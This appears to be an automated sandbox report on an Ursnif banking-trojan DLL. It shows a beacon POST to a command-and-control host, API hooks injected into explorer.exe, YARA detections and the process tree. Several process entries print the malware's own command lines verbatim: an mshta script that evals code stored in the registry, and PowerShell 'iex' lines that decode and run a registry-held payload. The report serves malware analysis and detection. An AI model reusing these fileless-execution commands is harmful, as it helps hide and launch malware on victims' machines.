                                                          Oct 7, 2021 01:34:10.121752024 CEST10311OUTPOST /oFicZj5usGm_2B0NL9gZLV/ZUmxvOk6Hl7SJ/EDK5fPOS/8bJn0oEKBXyaI_2FgFLHjIr/vR9EgPr9iZ/BsHMBlv9QxRTJNREz/mACP3yGg7skY/_2FdZEJn_2F/IV2mBc0GG_2FvT/53lPOvidBB1fn_2FI5kxG/suo5_2BB8niHf2Ry/rgnjnl9X_2F6HZr/tIOdn9dPOC7f1v8Cp_/2FP4dNfA6/YXJeUCPB5E1QadP6XZ0Z/70c_2FO_2BuW1MJ1FGY/r27cnguDBgf94rw_2FDi4i/aJyUeDcmN8xPq/7e51fVNw/PYHU8eZ8MJvwfaAYDz_2Fvf/Qi7bVln3AU/Hyoo0rU5uWfSrP9FI8hAt/b HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
                                                          Content-Length: 2
                                                          Host: art.microsoftsofymicrosoftsoft.at
                                                          Oct 7, 2021 01:34:10.121759892 CEST10311OUTData Raw: 0d 0a
                                                          Data Ascii:
                                                          Oct 7, 2021 01:34:10.640894890 CEST10311INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Wed, 06 Oct 2021 23:34:10 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Content-Length: 146
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Code Manipulations

                                                          User Modules

                                                          Hook Summary

                                                          Function NameHook TypeActive in Processes
                                                          api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIATexplorer.exe
                                                          api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIATexplorer.exe
                                                          CreateProcessAsUserWEATexplorer.exe
                                                          CreateProcessAsUserWINLINEexplorer.exe
                                                          CreateProcessWEATexplorer.exe
                                                          CreateProcessWINLINEexplorer.exe
                                                          CreateProcessAEATexplorer.exe
                                                          CreateProcessAINLINEexplorer.exe

                                                          Processes

                                                          Process: explorer.exe, Module: user32.dll
                                                          Function NameHook TypeNew Data
                                                          api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFABB035200
                                                          api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT6BEF6FC
                                                          Process: explorer.exe, Module: KERNEL32.DLL
                                                          Function NameHook TypeNew Data
                                                          CreateProcessAsUserWEAT7FFABB03521C
                                                          CreateProcessAsUserWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                          CreateProcessWEAT7FFABB035200
                                                          CreateProcessWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                          CreateProcessAEAT7FFABB03520E
                                                          CreateProcessAINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                          Process: explorer.exe, Module: WININET.dll
                                                          Function NameHook TypeNew Data
                                                          api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFABB035200
                                                          api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT6BEF6FC

                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          Analysis Process: loaddll32.exe PID: 6856 Parent PID: 6416

                                                          General

                                                          Start time:01:30:58
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\loaddll32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:loaddll32.exe 'C:\Users\user\Desktop\data.dll'
                                                          Imagebase:0xc70000
                                                          File size:893440 bytes
                                                          MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.825298638.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.820080731.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.820057009.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.820031645.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.883901477.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.1181853805.00000000030A9000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.820138747.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.883872155.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000000.00000003.825194509.00000000038CA000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.828362336.00000000037CC000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.883811052.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.884018260.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.820149124.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.883955178.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.883841890.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.820105585.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.798115453.00000000010D0000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.820124489.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.883968959.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.883922056.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.822798516.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.820157511.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000000.00000003.825244038.0000000003949000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000000.00000002.1182006594.000000000364F000.00000004.00000040.sdmp, Author: Joe Security
                                                          Reputation:moderate

                                                          Chronological Activities

                                                          Analysis Process: cmd.exe PID: 484 Parent PID: 6856

                                                          General

                                                          Start time:01:30:59
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\data.dll',#1
                                                          Imagebase:0x11d0000
                                                          File size:232960 bytes
                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Chronological Activities

                                                          Analysis Process: rundll32.exe PID: 6616 Parent PID: 6856

                                                          General

                                                          Start time:01:30:59
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:rundll32.exe C:\Users\user\Desktop\data.dll,Bonebegin
                                                          Imagebase:0xfe0000
                                                          File size:61952 bytes
                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmp, Author: Joe Security
                                                          Reputation:high

                                                          Chronological Activities

                                                          Analysis Process: rundll32.exe PID: 1848 Parent PID: 484

                                                          General

                                                          Start time:01:30:59
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:rundll32.exe 'C:\Users\user\Desktop\data.dll',#1
                                                          Imagebase:0xfe0000
                                                          File size:61952 bytes
                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.822188626.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.928533475.0000000004959000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.834818320.00000000052DC000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000003.00000003.831743156.0000000005459000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.822158100.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.776223175.00000000005A0000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.822174917.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.822140540.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.831790686.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.822201439.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000003.00000003.831611672.00000000053DA000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.822118999.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.822095380.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000003.00000002.950497075.000000000515F000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.822210258.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.825513786.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          Reputation:high

                                                          Chronological Activities

                                                          Analysis Process: rundll32.exe PID: 4500 Parent PID: 6856

                                                          General

                                                          Start time:01:31:03
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:rundll32.exe C:\Users\user\Desktop\data.dll,Father
                                                          Imagebase:0xfe0000
                                                          File size:61952 bytes
                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.786707655.0000000000D80000.00000040.00000001.sdmp, Author: Joe Security
                                                          Reputation:high

                                                          Chronological Activities

                                                          Analysis Process: rundll32.exe PID: 1444 Parent PID: 6856

                                                          General

                                                          Start time:01:31:07
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:rundll32.exe C:\Users\user\Desktop\data.dll,Ratherdesign
                                                          Imagebase:0xfe0000
                                                          File size:61952 bytes
                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.797262385.0000000000EF0000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.833489958.0000000004F69000.00000004.00000040.sdmp, Author: Joe Security
                                                          Reputation:high

                                                          Chronological Activities

                                                          Analysis Process: mshta.exe PID: 4812 Parent PID: 3424

                                                          General

                                                          Start time:01:32:26
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\mshta.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                                                          Imagebase:0x7ff7884e0000
                                                          File size:14848 bytes
                                                          MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          Chronological Activities

                                                          Analysis Process: mshta.exe PID: 6692 Parent PID: 3424

                                                          General

                                                          Start time:01:32:27
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\mshta.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dsd4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dsd4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                                                          Imagebase:0x7ff7884e0000
                                                          File size:14848 bytes
                                                          MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          Chronological Activities

                                                          Analysis Process: powershell.exe PID: 4588 Parent PID: 4812

                                                          General

                                                          Start time:01:32:27
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                                                          Imagebase:0x7ff7bedd0000
                                                          File size:447488 bytes
                                                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000000F.00000002.1028966230.0000029E58B09000.00000004.00000001.sdmp, Author: Joe Security
                                                          Reputation:high

                                                          Chronological Activities

                                                          Analysis Process: conhost.exe PID: 1568 Parent PID: 4588

                                                          General

                                                          Start time:01:32:28
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff724c50000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Chronological Activities

                                                          Analysis Process: powershell.exe PID: 3740 Parent PID: 6692

                                                          General

                                                          Start time:01:32:29
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                                                          Imagebase:0x7ff7bedd0000
                                                          File size:447488 bytes
                                                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp, Author: Joe Security
                                                          Reputation:high

                                                          Chronological Activities

                                                          Analysis Process: conhost.exe PID: 2812 Parent PID: 3740

                                                          General

                                                          Start time:01:32:29
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff724c50000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Chronological Activities

                                                          Analysis Process: csc.exe PID: 6836 Parent PID: 4588

                                                          General

                                                          Start time:01:32:34
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline'
                                                          Imagebase:0x7ff6bf5b0000
                                                          File size:2739304 bytes
                                                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          Chronological Activities

                                                          Analysis Process: csc.exe PID: 7024 Parent PID: 3740

                                                          General

                                                          Start time:01:32:34
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline'
                                                          Imagebase:0x7ff6bf5b0000
                                                          File size:2739304 bytes
                                                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          Chronological Activities

                                                          Analysis Process: cvtres.exe PID: 6316 Parent PID: 6836

                                                          General

                                                          Start time:01:32:35
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF604.tmp' 'c:\Users\user\AppData\Local\Temp\a52acufz\CSCA20CD7516B4D483281CF5F38543E99A.TMP'
                                                          Imagebase:0x7ff61d650000
                                                          File size:47280 bytes
                                                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Chronological Activities

                                                          Analysis Process: cvtres.exe PID: 4504 Parent PID: 7024

                                                          General

                                                          Start time:01:32:35
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF652.tmp' 'c:\Users\user\AppData\Local\Temp\aixojixg\CSC8AF62C77111B490CBA18A772C2BF28D9.TMP'
                                                          Imagebase:0x7ff61d650000
                                                          File size:47280 bytes
                                                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Chronological Activities

                                                          Analysis Process: csc.exe PID: 5528 Parent PID: 4588

                                                          General

                                                          Start time:01:32:37
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline'
                                                          Imagebase:0x7ff6bf5b0000
                                                          File size:2739304 bytes
                                                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          Chronological Activities

                                                          Analysis Process: csc.exe PID: 2088 Parent PID: 3740

                                                          General

                                                          Start time:01:32:37
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline'
                                                          Imagebase:0x7ff6bf5b0000
                                                          File size:2739304 bytes
                                                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          Chronological Activities

                                                          Analysis Process: cvtres.exe PID: 6200 Parent PID: 5528

                                                          General

                                                          Start time:01:32:38
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES20A.tmp' 'c:\Users\user\AppData\Local\Temp\ddwuzigh\CSCFB1F6E3C794C45BDA93B7DDF91AC3ADC.TMP'
                                                          Imagebase:0x7ff61d650000
                                                          File size:47280 bytes
                                                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Chronological Activities

                                                          Analysis Process: cvtres.exe PID: 6248 Parent PID: 2088

                                                          General

                                                          Start time:01:32:39
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47B.tmp' 'c:\Users\user\AppData\Local\Temp\keehvxm3\CSC58F6D56599B14CCABEBFA477BAE65D74.TMP'
                                                          Imagebase:0x7ff61d650000
                                                          File size:47280 bytes
                                                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Chronological Activities

                                                          Analysis Process: explorer.exe PID: 3424 Parent PID: 4588

                                                          General

                                                          Start time:01:32:44
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Explorer.EXE
                                                          Imagebase:0x7ff6fee60000
                                                          File size:3933184 bytes
                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000001C.00000000.960999590.0000000006BD1000.00000020.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000001C.00000000.960496675.0000000006AD1000.00000020.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000001C.00000000.952939817.0000000006BD1000.00000020.00020000.sdmp, Author: Joe Security

                                                          Chronological Activities

                                                          Analysis Process: control.exe PID: 6988 Parent PID: 6856

                                                          General

                                                          Start time:01:32:47
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\control.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\control.exe -h
                                                          Imagebase:0x7ff7880b0000
                                                          File size:117760 bytes
                                                          MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Chronological Activities

                                                          Analysis Process: rundll32.exe PID: 3980 Parent PID: 6988

                                                          General

                                                          Start time:01:32:51
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\rundll32.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                                                          Imagebase:0x7ff66d750000
                                                          File size:69632 bytes
                                                          MD5 hash:73C519F050C20580F8A62C849D49215A
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Chronological Activities

                                                          Analysis Process: control.exe PID: 4868 Parent PID: 1848

                                                          General

                                                          Start time:01:32:51
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\control.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\control.exe -h
                                                          Imagebase:0x7ff7880b0000
                                                          File size:117760 bytes
                                                          MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000022.00000000.912908766.0000000000920000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.917425679.000002BED198C000.00000004.00000040.sdmp, Author: Joe Security
